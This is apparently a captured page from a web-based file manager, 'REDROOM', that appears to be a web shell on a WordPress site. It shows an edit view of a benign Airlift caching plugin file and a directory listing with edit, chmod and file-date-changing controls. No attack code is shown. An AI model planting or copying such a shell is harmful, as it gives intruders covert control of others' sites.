REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 561 B
Close
/home/nshryvcy/blissfulnepal.com/wp-content/plugins/airlift/buffer/third_party_caching.php
Text
Base64
<?php if (!defined('ABSPATH')) exit; if (!class_exists('ALThirdPartyCache')) : class ALThirdPartyCache { function startThirdPartyHostCaching() { $cache_fname = dirname( __FILE__ ) . "/cache.php"; if (file_exists($cache_fname)) { require_once $cache_fname; $socache = new ALCache(); $socache->parseAirliftParamsHeader(); if (isset($socache->airlift_print_buffer) && !empty($socache->airlift_print_buffer)) { ob_start([$socache, 'serveBuffer']); } else { ob_start([$socache, 'optimizePage']); } } } } endif;
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 5
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
cache.php
20.86 KB
lrw-r--r--
2026-04-02 01:31:44
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
helper.php
1.83 KB
lrw-r--r--
2026-04-02 01:31:44
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
optimizer.php
89.70 KB
lrw-r--r--
2026-04-02 01:31:44
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
third_party_caching.php
561 B
lrw-r--r--
2026-04-02 01:31:44
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
validator.php
10.61 KB
lrw-r--r--
2026-04-02 01:31:44
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).